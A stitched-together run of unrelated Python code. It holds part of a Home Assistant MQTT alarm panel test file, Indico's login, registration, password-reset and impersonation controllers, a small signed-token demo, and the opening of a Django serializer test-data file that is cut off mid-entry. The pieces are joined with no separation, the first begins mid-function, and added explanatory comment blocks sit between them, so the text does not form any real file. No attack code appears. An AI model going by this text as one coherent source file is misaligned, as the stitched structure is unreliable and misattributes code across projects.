test_entity_device_info_with_connection(hass, mqtt_mock): """Test MQTT alarm control panel device registry integration.""" await help_test_entity_device_info_with_connection( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_entity_device_info_with_identifier(hass, mqtt_mock): """Test MQTT alarm control panel device registry integration.""" await help_test_entity_device_info_with_identifier( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_entity_device_info_update(hass, mqtt_mock): """Test device registry update.""" await help_test_entity_device_info_update( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_entity_device_info_remove(hass, mqtt_mock): """Test device registry remove.""" await help_test_entity_device_info_remove( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_entity_id_update_subscriptions(hass, mqtt_mock): """Test MQTT subscriptions are managed when entity_id is updated.""" await help_test_entity_id_update_subscriptions( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_entity_id_update_discovery_update(hass, mqtt_mock): """Test MQTT discovery update when entity_id is updated.""" await help_test_entity_id_update_discovery_update( hass, mqtt_mock, alarm_control_panel.DOMAIN, DEFAULT_CONFIG ) async def test_entity_debug_info_message(hass, mqtt_mock): """Test MQTT debug info.""" await help_test_entity_debug_info_message( hass, mqtt_mock, 
alarm_control_panel.DOMAIN, DEFAULT_CONFIG )
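# ---------------------------------------------------------------------------
# Illustrative note (not an executed test): the state_data1/state_data2 lists
# passed to help_test_discovery_update above are read here as
# [(mqtt_messages, expected_state, expected_attributes), ...], where
# mqtt_messages is a list of (topic, payload) tuples fired in order. This
# reading is inferred from how the entries are built in this file, not from
# the helper's own documentation.
EXAMPLE_DISCOVERY_STATE_DATA = [
    # Publish one JSON payload on alarm/state1 and expect the panel to report
    # "armed_away"; the trailing None means no attribute assertions are made.
    ([("alarm/state1", '{"state1":{"state":"armed_away"}}')], "armed_away", None),
]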
# This file is part of Indico. # Copyright (C) 2002 - 2021 CERN # # Indico is free software; you can redistribute it and/or # modify it under the terms of the MIT License; see the # LICENSE file for more details. from flask import flash, jsonify, redirect, render_template, request, session from itsdangerous import BadData, BadSignature from markupsafe import Markup from webargs import fields from werkzeug.exceptions import BadRequest, Forbidden, NotFound from indico.core import signals from indico.core.auth import login_rate_limiter, multipass from indico.core.config import config from indico.core.db import db from indico.core.notifications import make_email, send_email from indico.modules.admin import RHAdminBase from indico.modules.auth import Identity, logger, login_user from indico.modules.auth.forms import (AddLocalIdentityForm, EditLocalIdentityForm, LocalRegistrationForm, MultipassRegistrationForm, RegistrationEmailForm, ResetPasswordEmailForm, ResetPasswordForm, SelectEmailForm) from indico.modules.auth.models.registration_requests import RegistrationRequest from indico.modules.auth.util import impersonate_user, load_identity_info, register_user, undo_impersonate_user from indico.modules.auth.views import WPAuth, WPAuthUser from indico.modules.users import User from indico.modules.users.controllers import RHUserBase from indico.util.i18n import _ from indico.util.signing import secure_serializer from indico.web.args import use_kwargs from indico.web.flask.templating import get_template_module from indico.web.flask.util import url_for from indico.web.forms.base import FormDefaults, IndicoForm from indico.web.rh import RH from indico.web.util import url_for_index def _get_provider(name, external): try: provider = multipass.auth_providers[name] except KeyError: raise NotFound('Provider does not exist') if provider.is_external != external: raise NotFound('Invalid provider') return provider class RHLogin(RH): """The login page.""" # Disable global CSRF check. The form might not be an IndicoForm # but a normal WTForm from Flask-WTF which does not use the same # CSRF token as Indico forms use. But since the form has its own # CSRF check anyway disabling the global check is perfectly fine. CSRF_ENABLED = False def _process(self): login_reason = session.pop('login_reason', None) # User is already logged in if session.user is not None: multipass.set_next_url() return multipass.redirect_success() # Some clients attempt to incorrectly resolve redirections internally. 
# See https://github.com/indico/indico/issues/4720 for details user_agent = request.headers.get('User-Agent', '') sso_redirect = not any(s in user_agent for s in ('ms-office', 'Microsoft Office')) # If we have only one provider, and this provider is external, we go there immediately # However, after a failed login we need to show the page to avoid a redirect loop if not session.pop('_multipass_auth_failed', False) and 'provider' not in request.view_args and sso_redirect: single_auth_provider = multipass.single_auth_provider if single_auth_provider and single_auth_provider.is_external: multipass.set_next_url() return redirect(url_for('.login', provider=single_auth_provider.name)) # Save the 'next' url to go to after login multipass.set_next_url() # If there's a provider in the URL we start the external login process if 'provider' in request.view_args: provider = _get_provider(request.view_args['provider'], True) return provider.initiate_external_login() # If we have a POST request we submitted a login form for a local provider rate_limit_exceeded = False if request.method == 'POST': active_provider = provider = _get_provider(request.form['_provider'], False) form = provider.login_form() rate_limit_exceeded = not login_rate_limiter.test() if not rate_limit_exceeded and form.validate_on_submit(): response = multipass.handle_login_form(provider, form.data) if response: return response # re-check since a failed login may have triggered the rate limit rate_limit_exceeded = not login_rate_limiter.test() # Otherwise we show the form for the default provider else: active_provider = multipass.default_local_auth_provider form = active_provider.login_form() if active_provider else None providers = list(multipass.auth_providers.values()) retry_in = login_rate_limiter.get_reset_delay() if rate_limit_exceeded else None return render_template('auth/login_page.html', form=form, providers=providers, active_provider=active_provider, login_reason=login_reason, retry_in=retry_in) class RHLoginForm(RH): """Retrieve a login form (json).""" def _process(self): provider = _get_provider(request.view_args['provider'], False) form = provider.login_form() template_module = get_template_module('auth/_login_form.html') return jsonify(success=True, html=template_module.login_form(provider, form)) class RHLogout(RH): """Log the user out.""" def _process(self): next_url = request.args.get('next') if not next_url or not multipass.validate_next_url(next_url): next_url = url_for_index() return multipass.logout(next_url, clear_session=True) def _send_confirmation(email, salt, endpoint, template, template_args=None, url_args=None, data=None): template_args = template_args or {} url_args = url_args or {} token = secure_serializer.dumps(data or email, salt=salt) url = url_for(endpoint, token=token, _external=True, **url_args) template_module = get_template_module(template, email=email, url=url, **template_args) send_email(make_email(email, template=template_module)) flash(_('We have sent you a verification email. Please check your mailbox within the next hour and open ' 'the link in that email.')) return redirect(url_for(endpoint, **url_args)) class RHLinkAccount(RH): """Link a new identity with an existing user. This RH is only used if the identity information contains an email address and an existing user was found. """ def _process_args(self): self.identity_info = load_identity_info() if not self.identity_info or self.identity_info['indico_user_id'] is None: # Just redirect to the front page or whereever we wanted to go. 
# Probably someone simply used his browser's back button. flash('There is no pending login.', 'warning') return multipass.redirect_success() self.user = User.get(self.identity_info['indico_user_id']) self.emails = sorted(self.user.all_emails & set(self.identity_info['data'].getlist('email'))) self.verification_email_sent = self.identity_info.get('verification_email_sent', False) self.email_verified = self.identity_info['email_verified'] self.must_choose_email = len(self.emails) != 1 and not self.email_verified def _process(self): if self.verification_email_sent and 'token' in request.args: email = secure_serializer.loads(request.args['token'], max_age=3600, salt='link-identity-email') if email not in self.emails: raise BadData('Emails do not match') session['login_identity_info']['email_verified'] = True session.modified = True flash(_('You have successfully validated your email address and can now proceed with the login.'), 'success') return redirect(url_for('.link_account', provider=self.identity_info['provider'])) if self.must_choose_email: form = SelectEmailForm() form.email.choices = list(zip(self.emails, self.emails)) else: form = IndicoForm() if form.validate_on_submit(): if self.email_verified: return self._create_identity() elif not self.verification_email_sent: return self._send_confirmation(form.email.data if self.must_choose_email else self.emails[0]) else: flash(_('The validation email has already been sent.'), 'warning') return WPAuth.render_template('link_identity.html', identity_info=self.identity_info, user=self.user, email_sent=self.verification_email_sent, emails=' / '.join(self.emails), form=form, must_choose_email=self.must_choose_email) def _create_identity(self): identity = Identity(user=self.user, provider=self.identity_info['provider'], identifier=self.identity_info['identifier'], data=self.identity_info['data'], multipass_data=self.identity_info['multipass_data']) logger.info('Created new identity for %s: %s', self.user, identity) del session['login_identity_info'] db.session.flush() login_user(self.user, identity) return multipass.redirect_success() def _send_confirmation(self, email): session['login_identity_info']['verification_email_sent'] = True session['login_identity_info']['data']['email'] = email # throw away other emails return _send_confirmation(email, 'link-identity-email', '.link_account', 'auth/emails/link_identity_verify_email.txt', {'user': self.user}, url_args={'provider': self.identity_info['provider']}) class RHRegister(RH): """Create a new indico user. 
This handles two cases: - creation of a new user with a locally stored username and password - creation of a new user based on information from an identity provider """ def _process_args(self): self.identity_info = None self.provider_name = request.view_args['provider'] if self.provider_name is not None: self.identity_info = info = load_identity_info() if not info: return redirect(url_for('.login')) elif info['indico_user_id'] is not None or info['provider'] != self.provider_name: # If we have a matching user id, we shouldn't be on the registration page # If the provider doesn't match it would't be a big deal but the request doesn't make sense raise BadRequest elif not config.LOCAL_IDENTITIES: raise Forbidden('Local identities are disabled') elif not config.LOCAL_REGISTRATION: raise Forbidden('Local registration is disabled') def _get_verified_email(self): """Check if there is an email verification token.""" try: token = request.args['token'] except KeyError: return None, None try: return secure_serializer.loads(token, max_age=3600, salt='register-email'), False except BadSignature: return secure_serializer.loads(token, max_age=86400 * 31, salt='register-email-prevalidated'), True def _process(self): if session.user: return redirect(url_for_index()) handler = MultipassRegistrationHandler(self) if self.identity_info else LocalRegistrationHandler(self) verified_email, prevalidated = self._get_verified_email() if verified_email is not None: handler.email_verified(verified_email) if prevalidated: flash(_('You may change your email address after finishing the registration process.'), 'info') else: flash(_('You have successfully validated your email address and can now proceed with the ' 'registration.'), 'success') return redirect(url_for('.register', provider=self.provider_name)) form = handler.create_form() if not handler.moderate_registrations and not handler.must_verify_email: del form.comment # Check for pending users if we have verified emails pending = None if not handler.must_verify_email: pending = User.query.filter(~User.is_deleted, User.is_pending, User.all_emails.in_(list(handler.get_all_emails(form)))).first() if form.validate_on_submit(): if handler.must_verify_email: return self._send_confirmation(form.email.data) elif handler.moderate_registrations: return self._create_registration_request(form, handler) else: return self._create_user(form, handler) elif not form.is_submitted() and pending: # If we have a pending user, populate empty fields with data from that user for field in form: value = getattr(pending, field.short_name, '') if value and not field.data: field.data = value if pending: flash(_('There is already some information in Indico that concerns you. 
' 'We are going to link it automatically.'), 'info') return WPAuth.render_template('register.html', form=form, local=(not self.identity_info), must_verify_email=handler.must_verify_email, widget_attrs=handler.widget_attrs, email_sent=session.pop('register_verification_email_sent', False), moderate_accounts=handler.moderate_registrations) def _send_confirmation(self, email): session['register_verification_email_sent'] = True return _send_confirmation(email, 'register-email', '.register', 'auth/emails/register_verify_email.txt', url_args={'provider': self.provider_name}) def _prepare_registration_data(self, form, handler): email = form.email.data extra_emails = handler.get_all_emails(form) - {email} user_data = {k: v for k, v in form.data.items() if k in {'first_name', 'last_name', 'affiliation', 'address', 'phone'}} user_data.update(handler.get_extra_user_data(form)) identity_data = handler.get_identity_data(form) settings = { 'timezone': config.DEFAULT_TIMEZONE if session.timezone == 'LOCAL' else session.timezone, 'lang': session.lang or config.DEFAULT_LOCALE } return {'email': email, 'extra_emails': extra_emails, 'user_data': user_data, 'identity_data': identity_data, 'settings': settings} def _create_registration_request(self, form, handler): registration_data = self._prepare_registration_data(form, handler) email = registration_data['email'] req = RegistrationRequest.query.filter_by(email=email).first() or RegistrationRequest(email=email) req.comment = form.comment.data req.populate_from_dict(registration_data) db.session.add(req) db.session.flush() signals.users.registration_requested.send(req) flash(_('Your registration request has been received. We will send you an email once it has been processed.'), 'success') return handler.redirect_success() def _create_user(self, form, handler): user, identity = register_user(**self._prepare_registration_data(form, handler)) login_user(user, identity) msg = _('You have sucessfully registered your Indico profile. 
' 'Check <a href="{url}">your profile</a> for further details and settings.') flash(Markup(msg).format(url=url_for('users.user_profile')), 'success') db.session.flush() return handler.redirect_success() class RHAccounts(RHUserBase): """Display user accounts.""" def _create_form(self): if self.user.local_identity: defaults = FormDefaults(username=self.user.local_identity.identifier) local_account_form = EditLocalIdentityForm(identity=self.user.local_identity, obj=defaults) else: local_account_form = AddLocalIdentityForm() return local_account_form def _handle_add_local_account(self, form): identity = Identity(provider='indico', identifier=form.data['username'], password=form.data['password']) self.user.identities.add(identity) logger.info('User %s added a local account (%s)', self.user, identity.identifier) flash(_('Local account added successfully'), 'success') def _handle_edit_local_account(self, form): self.user.local_identity.identifier = form.data['username'] if form.data['new_password']: self.user.local_identity.password = form.data['new_password'] session.pop('insecure_password_error', None) logger.info('User %s (%s) changed their password', self.user, self.user.local_identity.identifier) flash(_('Your local account credentials have been updated successfully'), 'success') def _process(self): insecure_login_password_error = session.get('insecure_password_error') form = self._create_form() if form.validate_on_submit(): if isinstance(form, AddLocalIdentityForm): self._handle_add_local_account(form) elif isinstance(form, EditLocalIdentityForm): self._handle_edit_local_account(form) return redirect(url_for('auth.accounts')) provider_titles = {name: provider.title for name, provider in multipass.identity_providers.items()} return WPAuthUser.render_template('accounts.html', 'accounts', form=form, user=self.user, provider_titles=provider_titles, insecure_login_password_error=insecure_login_password_error) class RHRemoveAccount(RHUserBase): """Remove an identity linked to a user.""" def _process_args(self): RHUserBase._process_args(self) self.identity = Identity.get_or_404(request.view_args['identity']) if self.identity.user != self.user: raise NotFound() def _process(self): if session.get('login_identity') == self.identity.id: raise BadRequest("The identity used to log in can't be removed") if self.user.local_identity == self.identity: raise BadRequest("The main local identity can't be removed") self.user.identities.remove(self.identity) try: provider_title = multipass.identity_providers[self.identity.provider].title except KeyError: provider_title = self.identity.provider.title() flash(_('{provider} ({identifier}) successfully removed from your accounts' .format(provider=provider_title, identifier=self.identity.identifier)), 'success') return redirect(url_for('.accounts')) class RegistrationHandler: form = None def __init__(self, rh): pass def email_verified(self, email): raise NotImplementedError def get_form_defaults(self): raise NotImplementedError def create_form(self): defaults = self.get_form_defaults() if self.must_verify_email: # We don't bother with multiple emails here. The case that the provider sends more # than one email AND those emails are untrusted is so low it's simply not worth it. # The only drawback in that situation would be not showing the extra emails to the # user... 
return RegistrationEmailForm(obj=defaults) else: return self.form(obj=defaults) @property def widget_attrs(self): return {} @property def must_verify_email(self): raise NotImplementedError @property def moderate_registrations(self): return False def get_all_emails(self, form): # All (verified!) emails that should be set on the user. # This MUST include the primary email from the form if available. # Any additional emails will be set as secondary emails # The emails returned here are used to check for pending users return {form.email.data} if form.validate_on_submit() else set() def get_identity_data(self, form): raise NotImplementedError def get_extra_user_data(self, form): return {} def redirect_success(self): raise NotImplementedError class MultipassRegistrationHandler(RegistrationHandler): def __init__(self, rh): self.identity_info = rh.identity_info @property def from_sync_provider(self): # If the multipass login came from the provider that's used for synchronization return multipass.sync_provider and multipass.sync_provider.name == self.identity_info['provider'] def email_verified(self, email): session['login_identity_info']['data']['email'] = email session['login_identity_info']['email_verified'] = True session.modified = True def get_form_defaults(self): return FormDefaults(self.identity_info['data']) def create_form(self): form = super().create_form() # We only want the phone/address fields if the provider gave us data for it for field in {'address', 'phone'}: if field in form and not self.identity_info['data'].get(field): delattr(form, field) emails = self.identity_info['data'].getlist('email') form.email.choices = list(zip(emails, emails)) return form def form(self, **kwargs): if self.from_sync_provider: synced_values = {k: v or '' for k, v in self.identity_info['data'].items()} return MultipassRegistrationForm(synced_fields=multipass.synced_fields, synced_values=synced_values, **kwargs) else: return MultipassRegistrationForm(**kwargs) @property def must_verify_email(self): return not self.identity_info['email_verified'] @property def moderate_registrations(self): return self.identity_info['moderated'] def get_all_emails(self, form): emails = super().get_all_emails(form) return emails | set(self.identity_info['data'].getlist('email')) def get_identity_data(self, form): del session['login_identity_info'] return {'provider': self.identity_info['provider'], 'identifier': self.identity_info['identifier'], 'data': self.identity_info['data'], 'multipass_data': self.identity_info['multipass_data']} def get_extra_user_data(self, form): data = super().get_extra_user_data(form) if self.from_sync_provider: data['synced_fields'] = form.synced_fields | {field for field in multipass.synced_fields if field not in form} return data def redirect_success(self): return multipass.redirect_success() class LocalRegistrationHandler(RegistrationHandler): form = LocalRegistrationForm def __init__(self, rh): next_url = request.args.get('next') if next_url and multipass.validate_next_url(next_url): session['register_next_url'] = next_url @property def widget_attrs(self): return {'email': {'disabled': not self.must_verify_email}} @property def must_verify_email(self): return 'register_verified_email' not in session @property def moderate_registrations(self): return config.LOCAL_MODERATION def get_all_emails(self, form): emails = super().get_all_emails(form) if not self.must_verify_email: emails.add(session['register_verified_email']) return emails def email_verified(self, email): 
session['register_verified_email'] = email def get_form_defaults(self): email = session.get('register_verified_email') existing_user_id = session.get('register_pending_user') existing_user = User.get(existing_user_id) if existing_user_id else None data = {'email': email} if existing_user: data.update(first_name=existing_user.first_name, last_name=existing_user.last_name, affiliation=existing_user.affiliation) return FormDefaults(**data) def create_form(self): form = super().create_form() if not self.must_verify_email: form.email.data = session['register_verified_email'] return form def get_identity_data(self, form): del session['register_verified_email'] return {'provider': 'indico', 'identifier': form.username.data, 'password_hash': Identity.password.backend.create_hash(form.password.data)} def redirect_success(self): return redirect(session.pop('register_next_url', url_for_index())) class RHResetPassword(RH): """Reset the password for a local identity.""" def _process_args(self): if not config.LOCAL_IDENTITIES: raise Forbidden('Local identities are disabled') def _process(self): if 'token' in request.args: identity_id = secure_serializer.loads(request.args['token'], max_age=3600, salt='reset-password') identity = Identity.get(identity_id) if not identity: raise BadData('Identity does not exist') return self._reset_password(identity) else: return self._request_token() def _request_token(self): form = ResetPasswordEmailForm() if form.validate_on_submit(): user = form.user # The only case where someone would have more than one identity is after a merge. # And the worst case that can happen here is that we send the user a different # username than the one he expects. But he still gets back into his profile. # Showing a list of usernames would be a little bit more user-friendly but less # secure as we'd expose valid usernames for a specific user to an untrusted person. identity = next(iter(user.local_identities)) _send_confirmation(form.email.data, 'reset-password', '.resetpass', 'auth/emails/reset_password.txt', {'user': user, 'username': identity.identifier}, data=identity.id) session['resetpass_email_sent'] = True logger.info('Password reset requested for user %s', user) return redirect(url_for('.resetpass')) return WPAuth.render_template('reset_password.html', form=form, identity=None, widget_attrs={}, email_sent=session.pop('resetpass_email_sent', False)) def _reset_password(self, identity): form = ResetPasswordForm() if form.validate_on_submit(): identity.password = form.password.data flash(_('Your password has been changed successfully.'), 'success') login_user(identity.user, identity) logger.info('Password reset confirmed for user %s', identity.user) # We usually come here from a multipass login page so we should have a target url return multipass.redirect_success() form.username.data = identity.identifier return WPAuth.render_template('reset_password.html', form=form, identity=identity, email_sent=False, widget_attrs={'username': {'disabled': True}}) class RHAdminImpersonate(RHAdminBase): @use_kwargs({ 'undo': fields.Bool(missing=False), 'user_id': fields.Int(missing=None) }) def _process_args(self, undo, user_id): RHAdminBase._process_args(self) self.user = None if undo else User.get_or_404(user_id, is_deleted=False) def _check_access(self): if self.user: RHAdminBase._check_access(self) def _process(self): if self.user: impersonate_user(self.user) else: # no user? it means it's an undo undo_impersonate_user() return jsonify()
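# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the module above): both the registration
# and the password-reset flows rely on signed, salted, time-limited tokens.
# Indico's ``secure_serializer`` is assumed here to behave like itsdangerous'
# ``URLSafeTimedSerializer``; the secret key and the email address below are
# made up for illustration only.
from itsdangerous import BadSignature, URLSafeTimedSerializer


def _demo_register_tokens(secret_key='not-a-real-secret'):
    serializer = URLSafeTimedSerializer(secret_key)
    # A normal verification token, accepted for one hour (cf. _get_verified_email).
    token = serializer.dumps('someone@example.com', salt='register-email')
    email = serializer.loads(token, max_age=3600, salt='register-email')
    # Prevalidated tokens use a different salt and a much longer lifetime;
    # loading with the wrong salt fails, which is the distinction the
    # BadSignature fallback in _get_verified_email makes.
    try:
        serializer.loads(token, max_age=86400 * 31, salt='register-email-prevalidated')
    except BadSignature:
        prevalidated = False
    else:
        prevalidated = True
    return email, prevalidated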
""" A test spanning all the capabilities of all the serializers. This class defines sample data and a dynamically generated test case that is capable of testing the capabilities of the serializers. This includes all valid data values, plus forward, backwards and self references. """ from __future__ import absolute_import, unicode_literals import datetime import decimal try: import yaml except ImportError: yaml = None from django.core import serializers from django.core.serializers import SerializerDoesNotExist from django.core.serializers.base import DeserializationError from django.db import connection, models from django.http import HttpResponse from django.test import TestCase from django.utils.functional import curry from django.utils import six from django.utils.six.moves import StringIO from django.utils.unittest import skipUnless from .models import (BooleanData, CharData, DateData, DateTimeData, EmailData, FileData, FilePathData, DecimalData, FloatData, IntegerData, IPAddressData, GenericIPAddressData, NullBooleanData, PhoneData, PositiveIntegerData, PositiveSmallIntegerData, SlugData, SmallData, TextData, TimeData, USStateData, GenericData, Anchor, UniqueAnchor, FKData, M2MData, O2OData, FKSelfData, M2MSelfData, FKDataToField, FKDataToO2O, M2MIntermediateData, Intermediate, BooleanPKData, CharPKData, EmailPKData, FilePathPKData, DecimalPKData, FloatPKData, IntegerPKData, IPAddressPKData, GenericIPAddressPKData, PhonePKData, PositiveIntegerPKData, PositiveSmallIntegerPKData, SlugPKData, SmallPKData, USStatePKData, AutoNowDateTimeData, ModifyingSaveData, InheritAbstractModel, BaseModel, ExplicitInheritBaseModel, InheritBaseModel, ProxyBaseModel, ProxyProxyBaseModel, BigIntegerData, LengthModel, Tag, ComplexModel, NaturalKeyAnchor, FKDataNaturalKey) # A set of functions that can be used to recreate # test data objects of various kinds. # The save method is a raw base model save, to make # sure that the data in the database matches the # exact test case. def data_create(pk, klass, data): instance = klass(id=pk) instance.data = data models.Model.save_base(instance, raw=True) return [instance] def generic_create(pk, klass, data): instance = klass(id=pk) instance.data = data[0] models.Model.save_base(instance, raw=True) for tag in data[1:]: instance.tags.create(data=tag) return [instance] def fk_create(pk, klass, data): instance = klass(id=pk) setattr(instance, 'data_id', data) models.Model.save_base(instance, raw=True) return [instance] def m2m_create(pk, klass, data): instance = klass(id=pk) models.Model.save_base(instance, raw=True) instance.data = data return [instance] def im2m_create(pk, klass, data): instance = klass(id=pk) models.Model.save_base(instance, raw=True) return [instance] def im_create(pk, klass, data): instance = klass(id=pk) instance.right_id = data['right'] instance.left_id = data['left'] if 'extra' in data: instance.extra = data['extra'] models.Model.save_base(instance, raw=True) return [instance] def o2o_create(pk, klass, data): instance = klass() instance.data_id = data models.Model.save_base(instance, raw=True) return [instance] def pk_create(pk, klass, data): instance = klass() instance.data = data models.Model.save_base(instance, raw=True) return [instance] def inherited_create(pk, klass, data): instance = klass(id=pk,**data) # This isn't a raw save because: # 1) we're testing inheritance, not field behavior, so none # of the field values need to be protected. 
# 2) saving the child class and having the parent created # automatically is easier than manually creating both. models.Model.save(instance) created = [instance] for klass,field in instance._meta.parents.items(): created.append(klass.objects.get(id=pk)) return created # A set of functions that can be used to compare # test data objects of various kinds def data_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) testcase.assertEqual(data, instance.data, "Objects with PK=%d not equal; expected '%s' (%s), got '%s' (%s)" % ( pk, data, type(data), instance.data, type(instance.data)) ) def generic_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) testcase.assertEqual(data[0], instance.data) testcase.assertEqual(data[1:], [t.data for t in instance.tags.order_by('id')]) def fk_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) testcase.assertEqual(data, instance.data_id) def m2m_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) testcase.assertEqual(data, [obj.id for obj in instance.data.order_by('id')]) def im2m_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) #actually nothing else to check, the instance just should exist def im_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) testcase.assertEqual(data['left'], instance.left_id) testcase.assertEqual(data['right'], instance.right_id) if 'extra' in data: testcase.assertEqual(data['extra'], instance.extra) else: testcase.assertEqual("doesn't matter", instance.extra) def o2o_compare(testcase, pk, klass, data): instance = klass.objects.get(data=data) testcase.assertEqual(data, instance.data_id) def pk_compare(testcase, pk, klass, data): instance = klass.objects.get(data=data) testcase.assertEqual(data, instance.data) def inherited_compare(testcase, pk, klass, data): instance = klass.objects.get(id=pk) for key,value in data.items(): testcase.assertEqual(value, getattr(instance,key)) # Define some data types. Each data type is # actually a pair of functions; one to create # and one to compare objects of that type data_obj = (data_create, data_compare) generic_obj = (generic_create, generic_compare) fk_obj = (fk_create, fk_compare) m2m_obj = (m2m_create, m2m_compare) im2m_obj = (im2m_create, im2m_compare) im_obj = (im_create, im_compare) o2o_obj = (o2o_create, o2o_compare) pk_obj = (pk_create, pk_compare) inherited_obj = (inherited_create, inherited_compare) test_data = [ # Format: (data type, PK value, Model Class, data) (data_obj, 1, BooleanData, True), (data_obj, 2, BooleanData, False), (data_obj, 10, CharData, "Test Char Data"), (data_obj, 11, CharData, ""), (data_obj, 12, CharData, "None"), (data_obj, 13, CharData, "null"), (data_obj, 14, CharData, "NULL"), (data_obj, 15, CharData, None), # (We use something that will fit into a latin1 database encoding here, # because that is still the default used on many system setups.) 
(data_obj, 16, CharData, '\xa5'), (data_obj, 20, DateData, datetime.date(2006,6,16)), (data_obj, 21, DateData, None), (data_obj, 30, DateTimeData, datetime.datetime(2006,6,16,10,42,37)), (data_obj, 31, DateTimeData, None), (data_obj, 40, EmailData, "hovercraft@example.com"), (data_obj, 41, EmailData, None), (data_obj, 42, EmailData, ""), (data_obj, 50, FileData, 'file:///foo/bar/whiz.txt'), # (data_obj, 51, FileData, None), (data_obj, 52, FileData, ""), (data_obj, 60, FilePathData, "/foo/bar/whiz.txt"), (data_obj, 61, FilePathData, None), (data_obj, 62, FilePathData, ""), (data_obj, 70, DecimalData, decimal.Decimal('12.345')), (data_obj, 71, DecimalData, decimal.Decimal('-12.345')), (data_obj, 72, DecimalData, decimal.Decimal('0.0')), (data_obj, 73, DecimalData, None), (data_obj, 74, FloatData, 12.345), (data_obj, 75, FloatData, -12.345), (data_obj, 76, FloatData, 0.0), (data_obj, 77, FloatData, None), (data_obj, 80, IntegerData, 123456789), (data_obj, 81, IntegerData, -123456789), (data_obj, 82, IntegerData, 0), (data_obj, 83, IntegerData, None), #(XX, ImageData (data_obj, 90, IPAddressData, "127.0.0.1"), (data_obj, 91, IPAddressData, None), (data_obj, 95, GenericIPAddressData, "fe80:1424:2223:6cff:fe8a:2e8a:2151:abcd"), (data_obj, 96, GenericIPAddressData, None), (data_obj, 100, NullBooleanData, True), (data_obj, 101, NullBooleanData, False), (data_obj, 102, NullBooleanData, None), (data_obj, 110, PhoneData, "212-634-5789"), (data_obj, 111, PhoneData, None), (data_obj, 120, PositiveIntegerData, 123456789), (data_obj, 121, PositiveIntegerData, None), (data_obj, 130, PositiveSmallIntegerData, 12), (data_obj, 131, PositiveSmallIntegerData, None), (data_obj, 140, SlugData, "this-is-a-slug"), (data_obj, 141, SlugData, None), (data_obj, 142, SlugData, ""), (data_obj, 150, SmallData, 12), (data_obj, 151, SmallData, -12), (data_obj, 152, SmallData, 0), (data_obj, 153, SmallData, None), (data_obj, 160, TextData, """This is a long piece of text. It contains line breaks. Several of them. 
The end."""), (data_obj, 161, TextData, ""), (data_obj, 162, TextData, None), (data_obj, 170, TimeData, datetime.time(10,42,37)), (data_obj, 171, TimeData, None), (data_obj, 180, USStateData, "MA"), (data_obj, 181, USStateData, None), (data_obj, 182, USStateData, ""), (generic_obj, 200, GenericData, ['Generic Object 1', 'tag1', 'tag2']), (generic_obj, 201, GenericData, ['Generic Object 2', 'tag2', 'tag3']), (data_obj, 300, Anchor, "Anchor 1"), (data_obj, 301, Anchor, "Anchor 2"), (data_obj, 302, UniqueAnchor, "UAnchor 1"), (fk_obj, 400, FKData, 300), # Post reference (fk_obj, 401, FKData, 500), # Pre reference (fk_obj, 402, FKData, None), # Empty reference (m2m_obj, 410, M2MData, []), # Empty set (m2m_obj, 411, M2MData, [300,301]), # Post reference (m2m_obj, 412, M2MData, [500,501]), # Pre reference (m2m_obj, 413, M2MData, [300,301,500,501]), # Pre and Post reference (o2o_obj, None, O2OData, 300), # Post reference (o2o_obj, None, O2OData, 500), # Pre reference (fk_obj, 430, FKSelfData, 431), # Pre reference (fk_obj, 431, FKSelfData, 430), # Post reference (fk_obj, 432, FKSelfData, None), # Empty reference (m2m_obj, 440, M2MSelfData, []), (m2m_obj, 441, M2MSelfData, []), (m2m_obj, 442, M2MSelfData, [440, 441]), (m2m_obj, 443, M2MSelfData, [445, 446]), (m2m_obj, 444, M2MSelfData, [440, 441, 445, 446]), (m2m_obj, 445, M2MSelfData, []), (m2m_obj, 446, M2MSelfData, []), (fk_obj, 450, FKDataToField, "UAnchor 1"), (fk_obj, 451, FKDataToField, "UAnchor 2"), (fk_obj, 452, FKDataToField, None), (fk_obj, 460, FKDataToO2O, 300), (im2m_obj, 470, M2MIntermediateData, None), #testing post- and prereferences and extra fields (im_obj, 480, Intermediate, {'right': 300, 'left': 470}), (im_obj, 481, Intermediate, {'right': 300, 'left': 490}), (im_obj, 482, Intermediate, {'right': 500, 'left': 470}), (im_obj, 483, Intermediate, {'right': 500, 'left': 490}), (im_obj, 484, Intermediate, {'right': 300, 'left': 470, 'extra': "extra"}), (im_obj, 485, Intermediate, {'right': 300, 'left': 490, 'extra': "extra"}), (im_obj, 486, Intermediate, {'right': 500, 'left': 470, 'extra': "extra"}), (im_obj, 487, Intermediate, {'right': 500, 'left': 490, 'extra': "extra"}), (im2m_obj, 490, M2MIntermediateData, []), (data_obj, 500, Anchor, "Anchor 3"), (data_obj, 501, Anchor, "Anchor 4"), (data_obj, 502, UniqueAnchor, "UAnchor 2"), (pk_obj, 601, BooleanPKData, True), (pk_obj, 602, BooleanPKData, False), (pk_obj, 610, CharPKData, "Test Char PKData"), # (pk_obj, 620, DatePKData, datetime.date(2006,6,16)), # (pk_obj, 630, DateTimePKData, datetime.datetime(2006,6,16,10,42,37)), (pk_obj, 640, EmailPKData, "hovercraft@example.com"), # (pk_obj, 650, FilePKData, 'file:///foo/bar/whiz.txt'), (pk_obj, 660, FilePathPKData, "/foo/bar/whiz.txt"), (pk_obj, 670, DecimalPKData, decimal.Decimal('12.345')), (pk_obj, 671, DecimalPKData, decimal.Decimal('-12.345')), (pk_obj, 672, DecimalPKData, decimal.Decimal('0.0')), (pk_obj, 673, FloatPKData, 12.345), (pk_obj, 674, FloatPKData, -12.345), (pk_obj, 675, FloatPKData, 0.0), (pk_obj, 680, IntegerPKData, 123456789), (pk_obj, 681, IntegerPKData, -123456789), (pk_obj, 682, IntegerPKData, 0), # (XX, ImagePKData (pk_obj, 690, IPAddressPKData, "127.0.0.1"), (pk_obj, 695, GenericIPAddressPKData, 